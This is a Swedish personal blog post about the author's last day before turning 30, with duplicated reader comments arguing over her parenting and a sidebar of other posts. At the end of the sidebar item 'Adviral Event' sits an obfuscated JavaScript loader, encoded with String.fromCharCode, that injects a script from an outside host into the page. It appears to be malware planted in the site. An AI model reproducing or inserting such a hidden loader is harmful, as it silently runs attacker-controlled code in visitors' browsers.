Åldersnoja? Nej då.. Sista dagen som 20 plus

IMG_9107

Åldersnoja? Inte det minsta!

Sista dagen som 20 +

Hej fina cybervän!

Idag är det sista dagen som 20 + Jag har aldrig brytt mig så mycket om ålder egentligen. Jag har alltid haft ett brett umgänge med otroligt varierad ålder. Jag blev vuxen väldigt tidigt, så när jag var yngre var nästan alla 10-15 år äldre. Men med åren så har det planats ut…

Idag har jag både yngre och äldre vänner och kollegor.

MEN, jag har nog allt haft en vision om hur vet skulle se ut när jag fyllde 30. Hur jag skulle bo & leva. Inte in i minsta detalj, men ändå en ganska tydlig plan… Låt mig säga såhär.

-Det ser INTE ut, som jag hade tänkt mig. På långa vägar! Finns inget rätt eller fel, det ser bara inte ut som jag hade tänkt mig. Livet har fört mig i nya riktningar. Både privat och karriärsmässigt. 

Jag har alltid sett fram emot, just min 30 års dag! Vet inte riktigt varför.

Men som yngre har jag alltid fått höra hur ung jag varit. I företagandet, i min tidigare relation osv.. jag har alltid ”krigat” lite för min ålder. Nu plötligt så är jag långt ifrån yngst, och åldern spelar ingen roll för mig längre…  När jag var yngre så VILLE jag bli äldre. Att fylla just 30 har varit en milstolpe i livet!

Nåja. Det blir nog bra det här.

Jag har ställt in och skjutit fram min 30 års fest. För att jag helt enkelt inte orkar. Av flera anledningar. Trött efter operation. För mycket runt omkring, pendlingen, plugget och livet. Plus att jag är låg/deppig. Så i vår kommer jag köra en dansa-hela-natten fest istället =)

Just nu så kommer vi att ta det lugnt. Checka in på Hotel Skansen imorgon, jag Lilleman och Jonas. SÅ MYSIGT! På eftermiddagen kommer några vänner och äter middag med oss….  Ikväll spelar Jonas med Basic på Sandra . (haha! jag som verkligen inte tycker om sandra…. jag började springa där som 15åring… och hamnar där igen. KOMIST) Nåja, det kommer nog bli trevligt trots allt! Jag, min kalmar-fru och henens killa ska käka middag och sedan åka dit. Jonas  är med oss när han kan.. 

IMG_9119

Nu sitter Jonas på tåget påväg ner till Kalmar. Som VI längtar!!!!

Lilleman och jag är bara hemma och myser idag. Pyjamas och mys! Ikväll ska han sova hos sin faster. Han har packat en väska för ikväll och en inför spa imorgon… Förväntansfull liten kille som har gömt ett litet handgjord paket som han smusslat med i skolan.

-SÖTNÖT! Vi hörs sen!

Kram

/ My Martens 

45 Komentarer

 1. I morgon börjar dom bästa ljuva åren för dig mamma My. Se fram emot dom. Önskar dig allt gott framöver och en mysig lugn födelsedag. Kram ?

 2. I morgon börjar dom bästa ljuva åren för dig mamma My. Se fram emot dom. Önskar dig allt gott framöver och en mysig lugn födelsedag. Kram 🙂

 3. Stort grattis igen! Ha en mysig helg ?
  Ps ( är 55, och livet har ALDRIG hittills blivit som jag tänkt eller planerat, men det har varit enormt bra ändå ? Kram <3

 4. Stort grattis igen! Ha en mysig helg 🙂
  Ps ( är 55, och livet har ALDRIG hittills blivit som jag tänkt eller planerat, men det har varit enormt bra ändå 😉 Kram <3

 5. Det blir nog en helt underbar dag imorgon tillsammans med de som betyder mest för dig. ? se nu till att mysa och njuta hela dagen lång. ? det är du verkligen värd fina du.?ha en helt underbar födelsedag ? ???? kram Sara

 6. Det blir nog en helt underbar dag imorgon tillsammans med de som betyder mest för dig. 💕 se nu till att mysa och njuta hela dagen lång. 😊 det är du verkligen värd fina du.😘ha en helt underbar födelsedag 🎂 🎊🎈🎁🎁 kram Sara

 7. När min dotter var 7år träffade jag mitt livs kärlek(trodde jag)vi tre umgicks jämt och då mest hemma hos honom.min dotter verkade trivas förträffligt!hon var alltid glad och vi hittade på roligheter jämt!och jag som mamma var sååå glad?kärleken tog slut ?och min dotter och jag flyttade hem för gott i vårat gemensamma hem igen.idag är min dotter 16år och hon har berättat för mej att det var värsta tiden i hennes liv när vi bodde hos honom.hon ville inte visa för mej att hon var ledsen?och jag förstod inte det alls!jag tyckte ju att min dotter mådde jättebra!hon kände sej bilden och visste inte riktigt vart hennes hem var!vart skulle hon sova inatt när det är mamma vecka?tänk nu efter My!Lilleman måste känna sej så vilsen.och jag kan inte förstå ditt tänk!du borde ju vara skitglad när du är på Öland å mera ledsen när du är i sthlm!förstår att Öland varit jobbig i perioder för dej,men det kan kan ju inte varit överjävligt för då hade du väl aldrig ens tänkt tanken på och flytta tillbaka vilket du gjorde.du bor ju mera i Täby än på Öland,känns som storsatsning e viktigare…än NGT annat.och du pratar om alla jobb du måste ha för att överleva å betala..ta bort alla utemiddagar och dra ner på skönhetsoperationer så klarar du dej nog galant med dej och Ludwig i en trygg miljö på Öland?

  • Lena karlsson : jag tänker likadant ! om man inte är lycklig av att vara på samma plats som den man älskar mest av allt , jaa då vet jag inte ? själv hade jag lagt ner ALLT vad gäller sånt som gör att jag tvingas vara ifrån mitt enda barn en enda onödig sekund ! ingen karl eller karriär skulle ens komma i närheten av att inte göra precis allt för mitt barn ! och man får nog sega ut mer än ett halvår efter flytt och verkligen ge det en chans , Det måste vara fruktansvärt för ett barn att känna ( för det gör de ! du kan inte låtsas ) att mamma vantrivs och är bara lycklig långt därifrån och med en annan kärlek ! nej det här kommer inte sluta bra för den lille Ludwig tyvärr ?

   • Men herregud Helena! Skärpning! Det kommer inte sluta illa för Ludvig! Det var big bland detsummaTe jag hört! Han är omgiven av människor som älskar honom!

    • Ja My, jag tänker på dessa barn till Helena o Lena och hoppas att deras mammor bara vill provocera här inne och att dom förhoppningsvis inte är sådana i verkligheten med den synen för deras barns skull som sagt.

  • Ja du Lena, att barn vill vara sina föräldrar till lags för att inte göra mamma eller pappa ledsna det vet nog alla, men att din dotter upplevt den värsta tiden i sitt liv då ni bodde med din kärlek och du inte märkt ett skit då hon visat en annan sida enligt dig är skrämmande tycker jag.
   Nånstans känner man väl av sinnesnärvaro hos sitt barn under såpass lång tid ? Det sägs att människan blir både blind o annat när man blir träffad av kärleken o det verkar ha varit så i ditt fall.

 8. När min dotter var 7år träffade jag mitt livs kärlek(trodde jag)vi tre umgicks jämt och då mest hemma hos honom.min dotter verkade trivas förträffligt!hon var alltid glad och vi hittade på roligheter jämt!och jag som mamma var sååå glad😀kärleken tog slut 😑och min dotter och jag flyttade hem för gott i vårat gemensamma hem igen.idag är min dotter 16år och hon har berättat för mej att det var värsta tiden i hennes liv när vi bodde hos honom.hon ville inte visa för mej att hon var ledsen😑och jag förstod inte det alls!jag tyckte ju att min dotter mådde jättebra!hon kände sej bilden och visste inte riktigt vart hennes hem var!vart skulle hon sova inatt när det är mamma vecka?tänk nu efter My!Lilleman måste känna sej så vilsen.och jag kan inte förstå ditt tänk!du borde ju vara skitglad när du är på Öland å mera ledsen när du är i sthlm!förstår att Öland varit jobbig i perioder för dej,men det kan kan ju inte varit överjävligt för då hade du väl aldrig ens tänkt tanken på och flytta tillbaka vilket du gjorde.du bor ju mera i Täby än på Öland,känns som storsatsning e viktigare…än NGT annat.och du pratar om alla jobb du måste ha för att överleva å betala..ta bort alla utemiddagar och dra ner på skönhetsoperationer så klarar du dej nog galant med dej och Ludwig i en trygg miljö på Öland😀

  • Lena karlsson : jag tänker likadant ! om man inte är lycklig av att vara på samma plats som den man älskar mest av allt , jaa då vet jag inte ? själv hade jag lagt ner ALLT vad gäller sånt som gör att jag tvingas vara ifrån mitt enda barn en enda onödig sekund ! ingen karl eller karriär skulle ens komma i närheten av att inte göra precis allt för mitt barn ! och man får nog sega ut mer än ett halvår efter flytt och verkligen ge det en chans , Det måste vara fruktansvärt för ett barn att känna ( för det gör de ! du kan inte låtsas ) att mamma vantrivs och är bara lycklig långt därifrån och med en annan kärlek ! nej det här kommer inte sluta bra för den lille Ludwig tyvärr 🙁

   • Men herregud Helena! Skärpning! Det kommer inte sluta illa för Ludvig! Det var big bland detsummaTe jag hört! Han är omgiven av människor som älskar honom!

    • Ja My, jag tänker på dessa barn till Helena o Lena och hoppas att deras mammor bara vill provocera här inne och att dom förhoppningsvis inte är sådana i verkligheten med den synen för deras barns skull som sagt.

  • Ja du Lena, att barn vill vara sina föräldrar till lags för att inte göra mamma eller pappa ledsna det vet nog alla, men att din dotter upplevt den värsta tiden i sitt liv då ni bodde med din kärlek och du inte märkt ett skit då hon visat en annan sida enligt dig är skrämmande tycker jag.

   Nånstans känner man väl av sinnesnärvaro hos sitt barn under såpass lång tid ? Det sägs att människan blir både blind o annat när man blir träffad av kärleken o det verkar ha varit så i ditt fall.

 9. Lena tycker ditt inlägg är enbart korkat.
  Alla barn är olika, vissa mår bäst ha Samma trygghet alltid & mår lite dåligare oavsett om de kör varannan v och alltid samma rutiner., andra märks det inte på & min erfarenhet är att det bästa för barnen är trots allt att det tagit slut som yngre.
  Min son är 15 år, tog slut när jag var gravid, han har aldrig mått dåligt, tvärtom sagt vad bra att jag aldrig behövt höra er bråka, jag vet inte hur det är ha föräldrar som bor ihop, men vet hur bråk kan vara för endel vänners föräldrar bråkar.
  My känner jag inte, men hon känner sitt barn & lär göra det som passar honom bäst.
  Det är farligt döma andra, man inte känner.
  Men så typiskt kvinnor, försöka trycka ner istället för säga positiva saker.
  My grattis till din 30 årsdag & tycker nog du utstrålar mer nu sen jonas kom in i bilden, såg såklart fin ut innan med.
  Skit i bittra människor som Lena, de finns tyvärr överallt.

 10. Lena tycker ditt inlägg är enbart korkat.
  Alla barn är olika, vissa mår bäst ha Samma trygghet alltid & mår lite dåligare oavsett om de kör varannan v och alltid samma rutiner., andra märks det inte på & min erfarenhet är att det bästa för barnen är trots allt att det tagit slut som yngre.
  Min son är 15 år, tog slut när jag var gravid, han har aldrig mått dåligt, tvärtom sagt vad bra att jag aldrig behövt höra er bråka, jag vet inte hur det är ha föräldrar som bor ihop, men vet hur bråk kan vara för endel vänners föräldrar bråkar.

  My känner jag inte, men hon känner sitt barn & lär göra det som passar honom bäst.
  Det är farligt döma andra, man inte känner.
  Men så typiskt kvinnor, försöka trycka ner istället för säga positiva saker.

  My grattis till din 30 årsdag & tycker nog du utstrålar mer nu sen jonas kom in i bilden, såg såklart fin ut innan med.
  Skit i bittra människor som Lena, de finns tyvärr överallt.

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/